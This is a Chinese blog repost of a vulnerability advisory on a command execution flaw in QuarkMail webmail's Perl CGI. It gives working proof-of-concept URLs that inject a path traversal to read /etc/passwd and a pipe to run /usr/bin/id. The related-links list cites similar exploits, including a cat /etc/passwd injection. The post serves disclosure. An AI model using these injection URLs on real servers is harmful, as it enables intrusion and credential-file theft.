快客电邮(QuarkMail)远程命令执行漏洞

最新推荐文章于 2023-08-03 10:30:00 发布
最新推荐文章于 2023-08-03 10:30:00 发布
阅读量3.3k 收藏
点赞数
文章标签: perl cgi
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cnbird2008/article/details/6246099
版权

漏洞说明:快客电邮(QuarkMail)是北京雄智伟业科技公司推出的电子邮件系统,被广泛用于各个领域的电子邮件解决方案,其webmail部分使用perl cgi编写,但是80sec在其系统中发现一个重大的安全漏洞,导致远程用户可以在邮件系统上以当前进程身份执行任意命令,从而进一步控制主机或者系统。

漏洞厂商:http://www.ipmotor.com/

漏洞解析:QuarkMail错误地使用perl的open函数以打开文件,实现模板等功能,但是其对用户传入的参数没有做有效的过滤,从而导致一个命令执行漏洞。

漏洞证明:登录进入系统之后访问如下URL

http://mail.80sec.com.foo/cgi-bin/get_message.cgi?sk=tERZ6WI1&fd=inbox&p=1&l=10&max=2&lang=gb&tf=../../../../../../../etc/passwd%00&id=2&sort=0&read_flag=yes

 

即可得到系统账户文件,访问如下URL

http://mail.80sec.com.foo/cgi-bin/get_message.cgi?sk=tERZ6WI1&fd=inbox&p=1&l=10&max=2&lang=gb&tf=../../../../../../../usr/bin/id|%00&id=2&sort=0&read_flag=yes

 

即可以将/usr/bin/id文件打开执行,并且将结果返回,用户就可以利用一序列操作获得系统的完整访问权。

漏洞解决:请等待官方补丁。

cnbird2008
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
JAVA CGI 远程代码执行_ApacheTomca远程执行代码(CVE-2019-0232)漏洞浅析和复现
weixin_31236309的博客
03-04 319
ApacheTomca远程执行代码(CVE-2019-0232)漏洞浅析和复现一、 漏洞背景Apache Tomcat,俗称Tomcat Server,是一个开源的JavaServlet容器,由社区在Apache Software Foundation(ASF)的支持下开发。它实现了多个Java EE规范,包括Java Servlet,JavaServer Pages(JSP),Java表达式语言...
Zimbra 远程代码执行漏洞(CVE-2019-9670)漏洞分析
sxr__nc的博客
04-19 3770
漏洞的主要利用手法是通过。符号没有进行处理,就会导致上述类型的攻击,攻击者在发送上述类型的数据包的时候可以新建一个。的内容,这样一来处理数据会很方便,但同时也会有巨大的安全隐患:如果把目标。获取,其实只需要将上边的数据包中的字段修改下即可直接获取到高权限的。,在解析的过程中遇到实体的引用会直接获取相应的内容,即这里碰到。函数的处理流程,在整体的处理过程中对于请求的数据包,只针对。两个字段进行的解析,在解析的过程中会判断获取到的箱地址和。免费、简单,已经获得了广泛的支持,方便大众的使用。
开源件平台Zimbra 出现新漏洞,用户登录凭据可被盗
smellycat000的专栏
06-15 1769
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士研究人员发现 Zimbra 件套件中又出现一个高危漏洞 (CVE-2022-27924),如遭成功利用可导致未认证攻击者窃取用户明文密码且无需任何用户交互。研究员在报告中指出,“通过对受害者箱后续的访问权限,攻击者可能提升对目标组织机构的访问权限,并获得对多种内部服务的访问权限,窃取高度敏感信息。”CVE-2022-...
TA473 使用 Zimbra 漏洞攻击欧洲与北约的件系统
最新发布
wangluoanquan111的博客
08-03 1379
研究人员跟踪发现了部分可能是自定义 CSRF JavaScript 代码的实例,这些代码通过 CVE-2022-27926 来进行攻击。TA473 将其作为URL 超链接嵌入钓鱼件的正文中,这些 CSRF JavaScript 代码会由存在漏洞件服务器执行。这些 JavaScript代码复制并依赖于模拟本机 Web 件门户的 JavaScript 代码,以返回攻击目标的用户名、密码与 CSRF Token 等关键 Web请求详细信息。
CVE-2022-27925Zimbra Collaboration存在路径穿越漏洞最终导致RCE
include_voidmain的博客
07-07 2500
CVE-2022-27925Zimbra Collaboration存在路径穿越漏洞最终导致RCE
技术白皮书
03-04
北京雄智伟业科技有限公司在1996 调研国内 ISP 市场需求,发现充斥市场的件服务器产品 80%以上都是国外产品或者非专业的系统,因此...(Quarkmail)系列产品,同年末投向市场,提供专业的超大型件系统。
QuarkMail get_att.cgi 命令执行漏洞
收集盒 Book box
07-31 1505
漏洞类型: 命令执行漏洞 网站组件: QuarkMail 漏洞描述: QuarkMail是国内一款非常流行的件系统,其存在命令执行漏洞,攻击者可以利用该漏洞执行恶意系统命令在访问“  http://mail.xxx.com/cgi-bin/web2cgi/get_att.cgi?up_attach=|cat%20/etc/passwd  ”这样的地址时,ge
亿件系统远程命令执行漏洞 漏洞复现
Boom!脑洞大爆炸的博客
11-11 3134
亿件系统远程命令执行漏洞 漏洞复现
Zimbra漏洞
公众号shadow sock7
08-19 1548
参考: https://blog.tint0.com/2019/03/a-saga-of-code-executions-on-zimbra.html https://nvd.nist.gov/vuln/detail/CVE-2019-9670 https://nvd.nist.gov/vuln/detail/CVE-2016-9924 XXE CVE-2016-9924, CVE-2018-20...
Zimbra Domain Admin:Zimbra开源版的Zimbra Domain Admin-开源
05-08
Zimbra开源版的Zimbra Domain Admin。 从Zimbra Soap API开发PHP Web应用程序。 Zimbra Domain Admin可以列出,添加,删除和更改其用户域的密码,而无需Zimbra全局管理员权限。 PHP框架:Laravel 5.8软件版本PHP 7.1.3+ Zimbra 8+ Bootstrap 4 Star Admin模板
zimbra箱在线口令爆破脚本
02-23
利用python编写的脚本,用于zimbra箱服务器的用户口令在线爆破。
Zimbra 小于 8.8.11版本 XXE GetShell EXP.rar
05-08
Zimbra件系统<8.8.11 XXE SSRF远程代码执行漏洞GetShell 漏洞描述: 漏洞是利用XXE和ProxyServlet SSRF 漏洞拿到 admin authtoken 后,通过文件上传在服务端执行任意代码,威胁程度极高。当Zimbra服务端打来Memcached缓存服务是,可以利用SSRF攻击进行反序列化执行远程代码。不过由于Zimbra在单服务器安装中尽管Memcached虽然启动但是并没有进行使用,所以其攻击场景受到限制。 影响版本: ZimbraCollaboration Server 8.8.11 之前的版本都受到影响。具体来说: 1. Zimbra < 8.7.11 版本中,攻击者可以在无需登录的情况下,实现远程代码执行。 2. Zimbra < 8.8.11 版本中,在服务端使用 Memcached 做缓存的情况下,经过登录认证后的攻击者可以实现远程代码执行
JAVA CGI 远程代码执行_【漏洞复现】Tomcat CVE-2017-12615 远程代码执行漏洞
weixin_42474164的博客
02-27 497
漏洞描述【漏洞预警】Tomcat CVE-2017-12615远程代码执行漏洞/CVE-2017-12616信息泄漏https://www.secfree.com/article-395.html漏洞作者iswin from 360-sg-lab (360观星实验室)漏洞等级高漏洞复现在Tomcat的conf(配置目录下)/web.xml配置文件中添加readonly设置为false时,将导致该漏...
正在利用Zimbra ZCS中的未修复RCE漏洞
smellycat000的专栏
10-10 791
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士Zimbra 公司的企业协作软件和件平台中存在一个严重的远程代码执行漏洞且正遭活跃利用,目前尚不存在补丁。该漏洞的编号是CVE-2022-41352。该漏洞的CVSS评分为9.8,可导致攻击者上传任意文件并在受影响安装程序上执行恶意操作。网络安全公司Rapid7 在分析文章中指出,“该漏洞是因为Zimbra的反病毒引擎 Amavis扫描进站件...
zimbra漏洞利用
kzyyx的博客
08-31 4083
记一次渗透测试zimbra漏洞利用 当时通过界面判断判断出开发利用zimbra搭建的网站。zimbra又存在多个漏洞。 1.首先通过利用了CVE-2019-9670 XXE漏洞来尝试读取/etc/passwd 读取文件成功,证明此漏洞可以被成功利用。 2.接下来读取zimbra的配置文件获取密码,因为配置文件时xml文件,因此需要使用外部dtd获取信息。 请求接口:Post:/Autodiscover/Autodiscover.xml Zimbra配置文件位置为/conf/localconfig.xml 在
使用引流脚本,你不得不知的引流脚本相关知识
LoveWXJbe的博客
04-09 2476
现在的人们对源的需求越来越大,导致很多人为了源而发愁不已,基于这种情况,引流脚本圈开发了一款工具,就是专门为了引流源的软件,叫做引流脚本,那么引流脚本好不好用呢?效果如何呢?下面就来介绍一下这款引流脚本。 一、什么是引流脚本?关于什么是引流脚本,其实就是我们引流的技术人员为了让大家更好、更高效、更轻松的引流到源而写出来的一个程序。并没有大家想像中的那么高科技,不过确实非常实用,这可...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值